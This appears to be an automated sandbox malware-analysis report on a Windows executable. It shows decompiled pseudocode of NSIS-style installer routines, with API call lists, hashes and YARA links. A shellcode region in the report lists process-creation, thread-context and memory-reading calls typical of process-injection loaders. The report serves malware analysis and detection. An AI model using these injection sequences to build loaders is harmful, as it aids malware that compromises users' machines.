                  • Associated: 00000000.00000002.201589435.0000000010004000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CreateFilePathTemplstrcat
                  • String ID:
                  • API String ID: 3703170275-0
                  • Opcode ID: 2e3c343b61ca1dccaa9da63f431297c3969fd0e6073491528aad634e96b000c3
                  • Instruction ID: 421fc4e9ba5ff8b7bb9f6ce4fabf2472dde44f7dcf9b2062e22081b37b9d9e23
                  • Opcode Fuzzy Hash: 2e3c343b61ca1dccaa9da63f431297c3969fd0e6073491528aad634e96b000c3
                  • Instruction Fuzzy Hash: 4B516134C4D3D8BEEB11CBE5C8947EDBFB4AF1A241F0881C9E591A628AC2751349DB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004056AE, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004056AE(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                  0x004056b9
                  0x004056bd
                  0x004056c0
                  0x004056c6
                  0x004056ca
                  0x004056ce
                  0x004056d6
                  0x004056dd
                  0x004056e3
                  0x004056ea
                  0x004056f1
                  0x004056f9
                  0x004056fb
                  0x00000000
                  0x004056fb
                  0x00405705
                  0x0040570c
                  0x00405722
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405724
                  0x00405728

                  APIs
                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
                  • GetLastError.KERNEL32 ref: 00405705
                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040571A
                  • GetLastError.KERNEL32 ref: 00405724
                  Strings
                  • C:\Users\user\Desktop, xrefs: 004056AE
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                  • API String ID: 3449924974-3254906087
                  • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                  • Instruction ID: 8fda383858cfa3d81fea8572b973588b51770532f266deb4a47d6cf866d68d21
                  • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                  • Instruction Fuzzy Hash: 5E010871C00219EADF009BA0D944BEFBBB4EB04354F00403AD545B6190EB799648DF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040645C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040645C(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                  0x00406473
                  0x0040647c
                  0x0040647e
                  0x0040647e
                  0x00406482
                  0x00406494
                  0x0040648e
                  0x0040648e
                  0x0040648e
                  0x00406498
                  0x004064ac
                  0x004064c0
                  0x004064c7

                  APIs
                  • GetSystemDirectoryA.KERNEL32 ref: 00406473
                  • wsprintfA.USER32 ref: 004064AC
                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: DirectoryLibraryLoadSystemwsprintf
                  • String ID: %s%s.dll$UXTHEME$\
                  • API String ID: 2200240437-4240819195
                  • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                  • Instruction ID: 6b99be200e9776e1d1f000c3a85ac26a44316f32ef7d7cf08124b5af377bafc3
                  • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                  • Instruction Fuzzy Hash: C2F0FC305502096BDB15DB64DD0DFEB375CEB08304F1400BAA986E10C1EA78E5258B6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A81205, Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 800fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A8101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 00A81044
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A81B75
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: CreateFileSleep
                  • String ID: 669f90291f6b4262a69240a1b2a8dcd3
                  • API String ID: 2694422964-1230162162
                  • Opcode ID: 7ec625a9ce364abcf6c60824283fa6aaaf083153f61e8b640b2cdeae1eef859c
                  • Instruction ID: 4afc74b862f098c033dd3e96f62c9cb820f3e348716e8db3e9c7763f7de69437
                  • Opcode Fuzzy Hash: 7ec625a9ce364abcf6c60824283fa6aaaf083153f61e8b640b2cdeae1eef859c
                  • Instruction Fuzzy Hash: 1962F425A54398A9EB70CBA4AC16BFDB7B5AF44B10F1054C7E60CEE1E1D3B10ED09B16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A81C78, Relevance: 9.1, APIs: 6, Instructions: 118fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A81DE6: GetFileAttributesW.KERNELBASE(?,?,8A5B2944,?,?,?,00000000), ref: 00A81E07
                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,7F896FF1,?,D6EB2188,?,433A3842,?,A5F15738), ref: 00A81D2D
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: File$AttributesCreate
                  • String ID:
                  • API String ID: 415043291-0
                  • Opcode ID: 353922c013b1c6bb9a9569697a1afd08d58a6b4a6aa67ae33cb284356e4782a2
                  • Instruction ID: 54223529863f6b49eec71df414e8a078d2551a136cf1e71108c8e2e7a494e37e
                  • Opcode Fuzzy Hash: 353922c013b1c6bb9a9569697a1afd08d58a6b4a6aa67ae33cb284356e4782a2
                  • Instruction Fuzzy Hash: EE41C470E50209FFEF11AFA0CD0AFBEBAB5EF04351F604464F911B91A1D7715A52AB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405C89, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405C89(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                  0x00405c8d
                  0x00405c93
                  0x00405c94
                  0x00405c94
                  0x00405c99
                  0x00405c9a
                  0x00405c9d
                  0x00405ca7
                  0x00405cb4
                  0x00405cb7
                  0x00405cbf
                  0x00000000
                  0x00000000
                  0x00405cc3
                  0x00000000
                  0x00000000
                  0x00405cc5
                  0x00000000
                  0x00405cc5
                  0x00000000

                  APIs
                  • GetTickCount.KERNEL32 ref: 00405C9D
                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CB7
                  Strings
                  • nsa, xrefs: 00405C94
                  • "C:\Users\user\Desktop\SviRsoKz6E.exe" , xrefs: 00405C89
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C8C
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: "C:\Users\user\Desktop\SviRsoKz6E.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-815567179
                  • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                  • Instruction ID: eb5fe80d68cc8fd1173ec18eddb4fdb1002e2dce10a9d595da193ea2316e06a4
                  • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                  • Instruction Fuzzy Hash: BCF08236308308ABEB118F56ED04B9B7FACDF91750F10803BFA44DB280D6B499558798
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A80034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00A80373
                  • GetThreadContext.KERNELBASE(?,00010007), ref: 00A80396
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A803BA
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID: Process$ContextCreateMemoryReadThread
                  • String ID:
                  • API String ID: 2411489757-0
                  • Opcode ID: f9a22be93d76698d213c5d2ded5e8cdaa0c71751a059a8e2732e5da31f7572e3
                  • Instruction ID: 81e3bc82e70858e543b88510d4c023902abe35d0a1dad081a34384f4e0cd0338
                  • Opcode Fuzzy Hash: f9a22be93d76698d213c5d2ded5e8cdaa0c71751a059a8e2732e5da31f7572e3
                  • Instruction Fuzzy Hash: AF322631E40218EEEB60DBA4DD45FADB7B5FF08700F20449AE618FA2A1D7B05A94DF15
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 60%
                  			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4247f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247c8 =  *0x4247c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E004051E8(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b848, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403874(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                  0x0040209d
                  0x0040209d
                  0x004020a2
                  0x004020a9
                  0x00402164
                  0x004022dd
                  0x004022dd
                  0x00402a5a
                  0x00402a5d
                  0x00402a69
                  0x00402a69
                  0x004020b8
                  0x004020c2
                  0x004020c5
                  0x004020d4
                  0x004020d8
                  0x004020de
                  0x004020e2
                  0x0040215d
                  0x00000000
                  0x0040215d
                  0x004020e4
                  0x004020ed
                  0x004020f1
                  0x00402135
                  0x004020f3
                  0x004020f6
                  0x004020f9
                  0x00402129
                  0x004020fb
                  0x004020fe
                  0x00402107
                  0x00402109
                  0x00402109
                  0x00402107
                  0x004020f9
                  0x0040213d
                  0x00402152
                  0x00402152
                  0x00000000
                  0x0040213d
                  0x004020c8
                  0x004020ce
                  0x004020d2
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                    • Part of subcall function 004051E8: lstrlenA.KERNEL32(00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                    • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,00420508,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                    • Part of subcall function 004051E8: lstrcatA.KERNEL32(00420508,00403208,00403208,00420508,00000000,004178E0,00000000), ref: 00405244
                    • Part of subcall function 004051E8: SetWindowTextA.USER32(00420508,00420508), ref: 00405256
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                    • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                  • String ID:
                  • API String ID: 2987980305-0
                  • Opcode ID: bffba7cbc9bf954fca620dd5c6f657cd012cb4ee7ac81d79640b952aa277a1c5
                  • Instruction ID: 1a7932fae63aa7fb20f888994d80958c5ec2ba2518727ce514c528d89b281485
                  • Opcode Fuzzy Hash: bffba7cbc9bf954fca620dd5c6f657cd012cb4ee7ac81d79640b952aa277a1c5
                  • Instruction Fuzzy Hash: 08210B32A00125EBCF207FA58F49B5F76B0AF50359F21423BF211B61D1CBBC8982965E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405AF2(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405A84(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E0040572B(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405748(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056AE(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060C1("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                  0x004015bb
                  0x004015c2
                  0x004015c5
                  0x004015ca
                  0x004015ce
                  0x004015d0
                  0x004015d8
                  0x004015da
                  0x004015dc
                  0x004015e0
                  0x004015e3
                  0x004015fb
                  0x004015fc
                  0x004015e5
                  0x004015e5
                  0x004015e8
                  0x00000000
                  0x004015f3
                  0x004015f4
                  0x004015f4
                  0x004015e8
                  0x00401603
                  0x0040160a
                  0x00401617
                  0x00401617
                  0x0040160c
                  0x0040160d
                  0x00401615
                  0x00000000
                  0x00000000
                  0x00401615
                  0x0040160a
                  0x0040161a
                  0x0040161d
                  0x0040161f
                  0x00401620
                  0x004015d0
                  0x00401627
                  0x00401652
                  0x004022dd
                  0x00401629
                  0x0040162b
                  0x00401636
                  0x0040163c
                  0x00401644
                  0x0040164a
                  0x0040164a
                  0x00401644
                  0x00402a5d
                  0x00402a69

                  APIs
                    • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                    • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                    • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                    • Part of subcall function 004056AE: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 1892508949-501415292
                  • Opcode ID: fa060cad98318146cab1ede39612207b8ee0d3f57803be6218a14482ee073574
                  • Instruction ID: 89ad01db463442aa800da85bb51449bf5fbab0d3eae07559ae4194fd3409cb5d
                  • Opcode Fuzzy Hash: fa060cad98318146cab1ede39612207b8ee0d3f57803be6218a14482ee073574
                  • Instruction Fuzzy Hash: 05110831604051DBCF307FA54D409BF37B4DE92725B28067FE491B22D3DA3D49426A2E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406BF3, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00406BF3() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407061))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
